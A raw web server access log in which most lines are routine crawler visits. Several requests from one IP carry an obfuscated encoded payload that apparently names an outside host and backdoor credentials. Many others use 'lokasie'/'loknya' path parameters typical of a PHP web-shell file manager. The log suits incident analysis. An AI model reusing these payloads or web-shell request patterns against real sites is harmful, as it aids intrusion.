192.250.235.158 - - [21/Jul/2026:14:02:48 +0000] "GET /?ARRAY=7o2230223n313738343634363136382p2231223n22687474703n5p2s5p2s6877623235307631312r747269616465732r73686s705p2s3s6p633q7068705s636s64655s6n6326743q313738343634323536382q3864626335666336363339643262323230303538346638643764623834613532222p2232223n226636393832313739316462646532623335343262366335653632643861373831222p2233223n226434626232353337323331663838336165383538363561663665363532323133222p226175746s5s66696p655s6r616q65223n2266696p6566756r732r706870222p226175746s5s70617373223n2232302q34312q36302q36352q37312q38332q3136222p2262696r675s70617373223n2232362q34332q35372q36372q37322q38352q3138227q HTTP/1.1" 500 384 "-" "-"
66.249.72.69 - - [21/Jul/2026:14:04:59 +0000] "GET /detail/6269113757 HTTP/1.1" 200 29538 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/150.0.7871.128 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.72.71 - - [21/Jul/2026:14:05:03 +0000] "GET /ctg/search/similarImageSearchResultView/?ctgItemCd=75214422 HTTP/1.1" 200 30099 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/150.0.7871.128 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
92.222.108.118 - - [21/Jul/2026:14:05:09 +0000] "GET /items/B395659198/ HTTP/2" 404 3166 "-" "Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)"
192.250.235.158 - - [21/Jul/2026:14:03:10 +0000] "GET /?ARRAY=7o2230223n313738343634363139302p2231223n22687474703n5p2s5p2s6877623235307631312r747269616465732r73686s705p2s3s6p633q7068705s636s64655s6n6326743q313738343634323539302q3136333462666432316437386535626636656663346462303535326665616130222p2232223n226636393832313739316462646532623335343262366335653632643861373831222p2233223n226434626232353337323331663838336165383538363561663665363532323133222p226175746s5s66696p655s6r616q65223n2266696p6566756r732r706870222p226175746s5s70617373223n2232302q34312q36302q36352q37312q38332q3136222p2262696r675s70617373223n2232362q34332q35372q36372q37322q38352q3138227q HTTP/1.1" 500 384 "-" "-"
216.73.216.117 - - [21/Jul/2026:14:05:31 +0000] "GET /sitemap-13.xml?lokasie=%2Fhome%2Fvmxfzbqj%2Fpublic_html%2Fwp-includes%2Fhttp.php&loknya=%2Fhome%2Fvmxfzbqj%2Fpublic_html%2Fwp-includes HTTP/2" 404 7305 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
51.68.247.223 - - [21/Jul/2026:14:05:32 +0000] "GET /items/B395494258/ HTTP/2" 404 3164 "-" "Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)"
216.73.216.117 - - [21/Jul/2026:14:04:58 +0000] "GET /sitemap.xml?lokasie=%2Fhome%2Fvmxfzbqj%2Fpublic_html%2Fwp-includes%2Fclass-walker-page-dropdown.php&loknya=%2Fhome%2Fvmxfzbqj%2Fpublic_html%2Fwp-includes HTTP/2" 404 2651 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.117 - - [21/Jul/2026:14:05:01 +0000] "GET /sitemap-13.xml?lokasie=%2Fhome%2Fvmxfzbqj%2Fpublic_html%2Fwp-admin%2Fcustomize.php&loknya=%2Fhome%2Fvmxfzbqj%2Fpublic_html%2Fwp-admin HTTP/2" 404 5575 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.117 - - [21/Jul/2026:14:05:04 +0000] "GET /sitemap-10.xml?lokasie=%2Fhome%2Fvmxfzbqj%2Fpublic_html%2Fwp-includes%2Fupdate.php&loknya=%2Fhome%2Fvmxfzbqj%2Fpublic_html%2Fwp-includes HTTP/2" 404 10796 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.117 - - [21/Jul/2026:14:05:07 +0000] "GET /sitemap-13.xml?lokasie=%2Fhome%2Fvmxfzbqj%2Fpublic_html%2Fwp-includes%2Fclass-wp-metadata-lazyloader.php&loknya=%2Fhome%2Fvmxfzbqj%2Fpublic_html%2Fwp-includes HTTP/2" 404 3523 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.117 - - [21/Jul/2026:14:05:10 +0000] "GET /sitemap-13.xml?lokasie=%2Fhome%2Fvmxfzbqj%2Fpublic_html%2Fwp-admin%2Fexport.php&loknya=%2Fhome%2Fvmxfzbqj%2Fpublic_html%2Fwp-admin HTTP/2" 404 4955 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.117 - - [21/Jul/2026:14:05:13 +0000] "GET /sitemap-7.xml?lokasie=%2Fhome%2Fvmxfzbqj%2Fpublic_html%2Fwp-includes%2Fms-settings.php&loknya=%2Fhome%2Fvmxfzbqj%2Fpublic_html%2Fwp-includes HTTP/2" 404 3133 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.117 - - [21/Jul/2026:14:05:16 +0000] "GET /sitemap-10.xml?lokasie=%2Fhome%2Fvmxfzbqj%2Fpublic_html%2Fwp-admin%2Fedit-link-form.php&loknya=%2Fhome%2Fvmxfzbqj%2Fpublic_html%2Fwp-admin HTTP/2" 404 3830 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
37.59.204.150 - - [21/Jul/2026:14:05:17 +0000] "GET /items/B395551204/ HTTP/2" 404 3165 "-" "Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)"
216.73.216.117 - - [21/Jul/2026:14:05:19 +0000] "GET /sitemap-5.xml?lokasie=%2Fhome%2Fvmxfzbqj%2Fpublic_html%2Fwp-includes%2Ferror-protection.php&loknya=%2Fhome%2Fvmxfzbqj%2Fpublic_html%2Fwp-includes HTTP/2" 404 2949 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.117 - - [21/Jul/2026:14:05:22 +0000] "GET /sitemap-7.xml?lokasie=%2Fhome%2Fvmxfzbqj%2Fpublic_html%2Fwp-admin%2Fwidgets-form.php&loknya=%2Fhome%2Fvmxfzbqj%2Fpublic_html%2Fwp-admin HTTP/2" 404 7860 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.241.56 - - [21/Jul/2026:14:05:22 +0000] "GET /index.php?lokasie=/bin/podchecker&loknya=/bin HTTP/2" 404 3138 "https://www.laundrybandung.id/index.php?loknya=/bin" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
51.75.236.151 - - [21/Jul/2026:14:05:25 +0000] "GET /items/B395551167/ HTTP/2" 404 3130 "-" "Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)"
216.73.216.117 - - [21/Jul/2026:14:05:25 +0000] "GET /sitemap-10.xml?lokasie=%2Fhome%2Fvmxfzbqj%2Fpublic_html%2Fwp-includes%2Fatomlib.php&loknya=%2Fhome%2Fvmxfzbqj%2Fpublic_html%2Fwp-includes HTTP/2" 404 5073 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
192.250.235.158 - - [21/Jul/2026:14:03:33 +0000] "GET /?ARRAY=7o2230223n313738343634363231332p2231223n22687474703n5p2s5p2s6877623235307631312r747269616465732r73686s705p2s3s6p633q7068705s636s64655s6n6326743q313738343634323631332q3635393464363934393134663462316263376661643935343936656132643031222p2232223n226636393832313739316462646532623335343262366335653632643861373831222p2233223n226434626232353337323331663838336165383538363561663665363532323133222p226175746s5s66696p655s6r616q65223n2266696p6566756r732r706870222p226175746s5s70617373223n2232302q34312q36302q36352q37312q38332q3136222p2262696r675s70617373223n2232362q34332q35372q36372q37322q38352q3138227q HTTP/1.1" 500 384 "-" "-"
216.73.216.117 - - [21/Jul/2026:14:05:33 +0000] "GET /sitemap-10.xml?lokasie=%2Fhome%2Fvmxfzbqj%2Fpublic_html%2Fwp-admin%2Foptions.php&loknya=%2Fhome%2Fvmxfzbqj%2Fpublic_html%2Fwp-admin HTTP/2" 404 6414 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.117 - - [21/Jul/2026:14:05:36 +0000] "GET /sitemap-5.xml?lokasie=%2Fhome%2Fvmxfzbqj%2Fpublic_html%2Fwp-admin%2Fabout.php&loknya=%2Fhome%2Fvmxfzbqj%2Fpublic_html%2Fwp-admin HTTP/2" 404 6770 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.117 - - [21/Jul/2026:14:05:39 +0000] "GET /sitemap.xml?lokasie=%2Fhome%2Fvmxfzbqj%2Fpublic_html%2Fwp-includes%2Ftheme.json&loknya=%2Fhome%2Fvmxfzbqj%2Fpublic_html%2Fwp-includes HTTP/2" 404 4087 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
176.31.139.24 - - [21/Jul/2026:14:05:40 +0000] "GET /items/B395480271/ HTTP/2" 404 3164 "-" "Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)"
216.73.216.117 - - [21/Jul/2026:14:05:42 +0000] "GET /sitemap-10.xml?lokasie=%2Fhome%2Fvmxfzbqj%2Fpublic_html%2Fwp-includes%2Frewrite.php&loknya=%2Fhome%2Fvmxfzbqj%2Fpublic_html%2Fwp-includes HTTP/2" 404 7719 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.117 - - [21/Jul/2026:14:05:45 +0000] "GET /sitemap-10.xml?lokasie=%2Fhome%2Fvmxfzbqj%2Fpublic_html%2Fwp-includes%2Ftheme-templates.php&loknya=%2Fhome%2Fvmxfzbqj%2Fpublic_html%2Fwp-includes HTTP/2" 404 3114 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.117 - - [21/Jul/2026:14:05:48 +0000] "GET /sitemap-13.xml?lokasie=%2Fhome%2Fvmxfzbqj%2Fpublic_html%2Fwp-admin%2Fcustom-background.php&loknya=%2Fhome%2Fvmxfzbqj%2Fpublic_html%2Fwp-admin HTTP/2" 404 1748 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.117 - - [21/Jul/2026:14:05:51 +0000] "GET /sitemap-17.xml?lokasie=%2Fhome%2Fvmxfzbqj%2Fpublic_html%2Fwp-admin%2Fcustom-background.php&loknya=%2Fhome%2Fvmxfzbqj%2Fpublic_html%2Fwp-admin HTTP/2" 404 1748 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.117 - - [21/Jul/2026:14:05:54 +0000] "GET /sitemap-13.xml?lokasie=%2Fhome%2Fvmxfzbqj%2Fpublic_html%2Fwp-includes%2Fclass-wp-ajax-response.php&loknya=%2Fhome%2Fvmxfzbqj%2Fpublic_html%2Fwp-includes HTTP/2" 404 3438 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
192.250.235.158 - - [21/Jul/2026:14:03:55 +0000] "GET /?ARRAY=7o2230223n313738343634363233352p2231223n22687474703n5p2s5p2s6877623235307631312r747269616465732r73686s705p2s3s6p633q7068705s636s64655s6n6326743q313738343634323633352q6565393664643632393036333439333964343937663039363238333666663866222p2232223n226636393832313739316462646532623335343262366335653632643861373831222p2233223n226434626232353337323331663838336165383538363561663665363532323133222p226175746s5s66696p655s6r616q65223n2266696p6566756r732r706870222p226175746s5s70617373223n2232302q34312q36302q36352q37312q38332q3136222p2262696r675s70617373223n2232362q34332q35372q36372q37322q38352q3138227q HTTP/1.1" 500 384 "-" "-"
94.23.188.210 - - [21/Jul/2026:14:05:56 +0000] "GET /items/B395422197/ HTTP/2" 404 3164 "-" "Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)"
216.73.216.117 - - [21/Jul/2026:14:05:57 +0000] "GET /sitemap-9.xml?lokasie=%2Fhome%2Fvmxfzbqj%2Fpublic_html%2Fwp-admin%2Finstall-helper.php&loknya=%2Fhome%2Fvmxfzbqj%2Fpublic_html%2Fwp-admin HTTP/2" 404 3498 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.117 - - [21/Jul/2026:14:06:00 +0000] "GET /sitemap-17.xml?lokasie=%2Fhome%2Fvmxfzbqj%2Fpublic_html%2Fwp-includes%2Fclass-wp-ajax-response.php&loknya=%2Fhome%2Fvmxfzbqj%2Fpublic_html%2Fwp-includes HTTP/2" 404 3438 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.117 - - [21/Jul/2026:14:06:03 +0000] "GET /sitemap-7.xml?lokasie=%2Fhome%2Fvmxfzbqj%2Fpublic_html%2Fwp-includes%2Fclass-wp-duotone.php&loknya=%2Fhome%2Fvmxfzbqj%2Fpublic_html%2Fwp-includes HTTP/2" 404 11575 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
37.59.204.132 - - [21/Jul/2026:14:06:03 +0000] "GET /items/B395409961/ HTTP/2" 404 3164 "-" "Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)"
216.73.216.117 - - [21/Jul/2026:14:06:06 +0000] "GET /sitemap-5.xml?lokasie=%2Fhome%2Fvmxfzbqj%2Fpublic_html%2Fwp-includes%2Fview-transitions.php&loknya=%2Fhome%2Fvmxfzbqj%2Fpublic_html%2Fwp-includes HTTP/2" 404 1796 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.117 - - [21/Jul/2026:14:06:09 +0000] "GET /sitemap.xml?lokasie=%2Fhome%2Fvmxfzbqj%2Fpublic_html%2Fwp-includes%2Fclass-wp-paused-extensions-storage.php&loknya=%2Fhome%2Fvmxfzbqj%2Fpublic_html%2Fwp-includes HTTP/2" 404 2808 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
51.75.236.149 - - [21/Jul/2026:14:06:11 +0000] "GET /items/B395358379/ HTTP/2" 404 3165 "-" "Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)"
216.73.216.117 - - [21/Jul/2026:14:06:12 +0000] "GET /sitemap-1.xml?lokasie=%2Fhome%2Fvmxfzbqj%2Fpublic_html%2Fwp-includes%2Ftemplate-canvas.php&loknya=%2Fhome%2Fvmxfzbqj%2Fpublic_html%2Fwp-includes HTTP/2" 404 1825 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.117 - - [21/Jul/2026:14:06:15 +0000] "GET /sitemap-9.xml?lokasie=%2Fhome%2Fvmxfzbqj%2Fpublic_html%2Fwp-includes%2Fbookmark-template.php&loknya=%2Fhome%2Fvmxfzbqj%2Fpublic_html%2Fwp-includes HTTP/2" 404 4994 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
192.250.235.158 - - [21/Jul/2026:14:04:17 +0000] "GET /?ARRAY=7o2230223n313738343634363235372p2231223n22687474703n5p2s5p2s6877623235307631312r747269616465732r73686s705p2s3s6p633q7068705s636s64655s6n6326743q313738343634323635372q3561306561616430376433623639663930636663653865656231373832633065222p2232223n226636393832313739316462646532623335343262366335653632643861373831222p2233223n226434626232353337323331663838336165383538363561663665363532323133222p226175746s5s66696p655s6r616q65223n2266696p6566756r732r706870222p226175746s5s70617373223n2232302q34312q36302q36352q37312q38332q3136222p2262696r675s70617373223n2232362q34332q35372q36372q37322q38352q3138227q HTTP/1.1" 500 384 "-" "-"
216.73.216.117 - - [21/Jul/2026:14:06:18 +0000] "GET /sitemap.xml?lokasie=%2Fhome%2Fvmxfzbqj%2Fpublic_html%2Fwp-includes%2Ftaxonomy.php&loknya=%2Fhome%2Fvmxfzbqj%2Fpublic_html%2Fwp-includes HTTP/2" 404 42146 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.117 - - [21/Jul/2026:14:06:21 +0000] "GET /sitemap-15.xml?lokasie=%2Fhome%2Fvmxfzbqj%2Fpublic_html%2Fwp-admin%2Finstall.php&loknya=%2Fhome%2Fvmxfzbqj%2Fpublic_html%2Fwp-admin HTTP/2" 404 7331 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
66.249.72.70 - - [21/Jul/2026:14:06:22 +0000] "GET /detail/6861865494 HTTP/1.1" 200 31169 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/150.0.7871.128 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
216.73.216.117 - - [21/Jul/2026:14:06:24 +0000] "GET /sitemap-1.xml?lokasie=%2Fhome%2Fvmxfzbqj%2Fpublic_html%2Fwp-includes%2Fai-client.php&loknya=%2Fhome%2Fvmxfzbqj%2Fpublic_html%2Fwp-includes HTTP/2" 404 2383 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.241.56 - - [21/Jul/2026:14:06:25 +0000] "GET /index.php?lokasie=/bin/autoheader&loknya=/bin HTTP/2" 429 0 "https://www.laundrybandung.id/index.php?loknya=/bin" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
66.249.72.69 - - [21/Jul/2026:14:06:26 +0000] "GET /detail/1595706493 HTTP/1.1" 200 29762 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/150.0.7871.128 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
216.73.216.117 - - [21/Jul/2026:14:06:27 +0000] "GET /sitemap-1.xml?lokasie=%2Fhome%2Fvmxfzbqj%2Fpublic_html%2Fwp-includes%2Fcategory-template.php&loknya=%2Fhome%2Fvmxfzbqj%2Fpublic_html%2Fwp-includes HTTP/2" 404 15668 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
66.249.72.69 - - [21/Jul/2026:14:06:28 +0000] "GET /detail/5296874362 HTTP/1.1" 200 30297 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/150.0.7871.128 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.72.69 - - [21/Jul/2026:14:06:29 +0000] "GET /detail/3422175847 HTTP/1.1" 200 32004 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/150.0.7871.128 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
216.73.216.117 - - [21/Jul/2026:14:06:30 +0000] "GET /sitemap-13.xml?lokasie=%2Fhome%2Fvmxfzbqj%2Fpublic_html%2Fwp-includes%2Fcategory.php&loknya=%2Fhome%2Fvmxfzbqj%2Fpublic_html%2Fwp-includes HTTP/2" 404 5305 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
66.249.72.69 - - [21/Jul/2026:14:06:31 +0000] "GET /detail/296719403 HTTP/1.1" 200 29422 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/150.0.7871.128 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
216.73.216.117 - - [21/Jul/2026:14:06:33 +0000] "GET /sitemap.xml?lokasie=%2Fhome%2Fvmxfzbqj%2Fpublic_html%2Fwp-includes%2Fl10n.php&loknya=%2Fhome%2Fvmxfzbqj%2Fpublic_html%2Fwp-includes HTTP/2" 404 15828 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
51.68.247.197 - - [21/Jul/2026:14:06:34 +0000] "GET /items/B395310113/ HTTP/2" 404 3165 "-" "Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)"
66.249.72.69 - - [21/Jul/2026:14:06:35 +0000] "GET /detail/3484005561 HTTP/1.1" 200 30085 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/150.0.7871.128 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
57.141.0.37 - - [21/Jul/2026:14:05:40 +0000] "GET /items/B391080178/ HTTP/2" 429 0 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36 (compatible; meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler))"
5.39.1.248 - - [21/Jul/2026:14:05:48 +0000] "GET /items/B395425230/ HTTP/2" 404 3165 "-" "Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)"
66.249.72.69 - - [21/Jul/2026:14:05:57 +0000] "GET /detail/1072225398 HTTP/1.1" 200 29019 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/150.0.7871.128 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.72.71 - - [21/Jul/2026:14:06:14 +0000] "GET /detail/5414481065 HTTP/1.1" 200 29739 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/150.0.7871.128 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
5.39.1.246 - - [21/Jul/2026:14:06:19 +0000] "GET /items/B395347117/ HTTP/2" 404 3167 "-" "Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)"
66.249.72.69 - - [21/Jul/2026:14:06:20 +0000] "GET /detail/2744540759 HTTP/1.1" 200 30655 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/150.0.7871.128 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
37.59.204.151 - - [21/Jul/2026:14:06:26 +0000] "GET /items/B392829499/ HTTP/2" 404 3131 "-" "Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)"
192.250.235.158 - - [21/Jul/2026:14:04:39 +0000] "GET /?ARRAY=7o2230223n313738343634363237392p2231223n22687474703n5p2s5p2s6877623235307631312r747269616465732r73686s705p2s3s6p633q7068705s636s64655s6n6326743q313738343634323637392q3938323431343465646430663665366563643962656435346664326162303633222p2232223n226636393832313739316462646532623335343262366335653632643861373831222p2233223n226434626232353337323331663838336165383538363561663665363532323133222p226175746s5s66696p655s6r616q65223n2266696p6566756r732r706870222p226175746s5s70617373223n2232302q34312q36302q36352q37312q38332q3136222p2262696r675s70617373223n2232362q34332q35372q36372q37322q38352q3138227q HTTP/1.1" 500 384 "-" "-"
94.23.188.192 - - [21/Jul/2026:14:06:42 +0000] "GET /items/B395241324/ HTTP/2" 404 3034 "-" "Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)"
66.249.72.70 - - [21/Jul/2026:14:06:42 +0000] "GET /detail/5804318343 HTTP/1.1" 200 29641 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/150.0.7871.128 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.72.70 - - [21/Jul/2026:14:06:45 +0000] "GET /detail/555154303 HTTP/1.1" 200 30247 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/150.0.7871.128 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
57.141.0.61 - - [21/Jul/2026:14:06:47 +0000] "GET /items/B395339535/ HTTP/2" 429 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36 (compatible; meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler))"
66.249.72.70 - - [21/Jul/2026:14:06:47 +0000] "GET /detail/1334444433 HTTP/1.1" 200 31456 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/150.0.7871.128 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
5.39.1.246 - - [21/Jul/2026:14:06:49 +0000] "GET /items/B395223665/ HTTP/2" 404 3167 "-" "Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)"
216.73.216.117 - - [21/Jul/2026:14:06:36 +0000] "GET /sitemap-5.xml?lokasie=%2Fhome%2Fvmxfzbqj%2Fpublic_html%2Fwp-includes%2Fclass-wp-widget-factory.php&loknya=%2Fhome%2Fvmxfzbqj%2Fpublic_html%2Fwp-includes HTTP/2" 404 2520 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
66.249.72.69 - - [21/Jul/2026:14:06:37 +0000] "GET /detail/428502766 HTTP/1.1" 200 29456 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/150.0.7871.128 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
216.73.216.117 - - [21/Jul/2026:14:06:39 +0000] "GET /sitemap-17.xml?lokasie=%2Fhome%2Fvmxfzbqj%2Fpublic_html%2Fwp-includes%2Fcategory.php&loknya=%2Fhome%2Fvmxfzbqj%2Fpublic_html%2Fwp-includes HTTP/2" 404 5305 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
66.249.72.69 - - [21/Jul/2026:14:06:39 +0000] "GET /detail/1962644111 HTTP/1.1" 200 30670 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/150.0.7871.128 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
216.73.216.117 - - [21/Jul/2026:14:06:42 +0000] "GET /sitemap-7.xml?lokasie=%2Fhome%2Fvmxfzbqj%2Fpublic_html%2Fwp-includes%2Fclass-wp-tax-query.php&loknya=%2Fhome%2Fvmxfzbqj%2Fpublic_html%2Fwp-includes HTTP/2" 404 7105 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.117 - - [21/Jul/2026:14:06:45 +0000] "GET /sitemap-5.xml?lokasie=%2Fhome%2Fvmxfzbqj%2Fpublic_html%2Fwp-admin%2Fupgrade-functions.php&loknya=%2Fhome%2Fvmxfzbqj%2Fpublic_html%2Fwp-admin HTTP/2" 404 1688 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
